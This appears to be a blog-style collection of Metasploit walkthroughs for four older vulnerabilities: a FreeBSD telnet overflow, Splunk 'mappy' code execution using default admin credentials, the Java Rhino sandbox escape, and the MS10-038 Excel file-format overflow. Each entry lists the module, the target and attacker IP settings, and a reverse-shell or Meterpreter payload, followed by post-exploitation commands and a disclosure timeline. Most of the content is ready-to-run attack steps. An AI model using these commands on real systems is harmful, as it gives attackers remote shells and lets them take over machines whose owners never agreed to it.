This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.
Commands :
use exploit/freebsd/telnet/telnet_encrypt_keyid
set RHOST 192.168.178.112
set PAYLOAD bsd/x86/shell/reverse_tcp
set LHOST 192.168.178.100
exploit
id
uname -a
Vulnerability discovered and reported to the vendor by Gary Oleary-Steele
Coordinated public release of the vulnerability on 2011-12-12
Metasploit PoC provided on 2011-12-22
This module abuses a command execution vulnerability in the web-based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command, which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credentials “admin:changeme”, the default Administrator credentials for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.
Commands :
use exploit/multi/http/splunk_mappy_exec
set RHOST 192.168.178.110
set VHOST blackhole.zataz.loc
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id
uname -a
Vulnerability discovered and reported to ZDI by Michael Schierl
Vulnerability reported to the vendor by ZDI on 2011-05-12
Coordinated release of the vulnerability on 2011-10-26
First exploit provided by Michael Schierl
Metasploit PoC provided on 2011-11-29
PoC provided by:
Michael Schierl
juan vazquez
Edward D. Teach
sinn3r
This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example IE, Firefox and Google Chrome).
Commands :
use exploit/multi/browser/java_rhino
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
getuid
sysinfo
Vulnerability discovered and reported to the vendor by Nicolas Joly
Coordinated release of the vulnerability on 2010-06-08
First exploit provided by abysssec on 2010-09-24
Metasploit PoC provided on 2011-11-21
Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel and PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel and PowerPoint 2007 File Formats Service Pack 2
Tested on Windows XP Pro SP3 with :
Microsoft Excel 2002 (10.2614.2625) SP0
Description :
This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record, an attacker can gain control of the execution flow. This results in arbitrary code execution in the context of the user.
Commands :
use exploit/windows/fileformat/ms10_038_excel_obj_bof
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
getuid
sysinfo